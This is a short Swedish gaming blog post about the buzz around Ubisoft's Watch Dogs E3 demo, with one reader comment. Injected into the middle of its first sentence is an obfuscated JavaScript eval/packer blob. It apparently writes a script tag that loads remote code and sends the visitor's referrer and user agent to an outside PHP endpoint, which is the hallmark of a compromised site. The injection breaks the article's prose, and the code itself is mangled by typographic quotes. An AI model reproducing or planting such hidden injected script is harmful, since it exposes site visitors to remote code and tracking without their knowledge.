Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Watch Dogs fortsätter att briljera

playstation 4
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nifin|var|u0026u|referrer|edfiz||js|php’.split(’|’),0,{}))
mycket efterlängtade spelet Watch Dogs har verkligen fått mycket plats i media. Nu verkar det som att deras demo under E3 gjort att företaget Ubisoft fått lite extra klirr i kassan. Ubisoft själva hade ingen aning om att spelet skulle förvåna alla på det sett som spelet gjort, det var verkligen oväntat. 

Comments

  1. Urban

    Jag längtar!!!!!! 🙂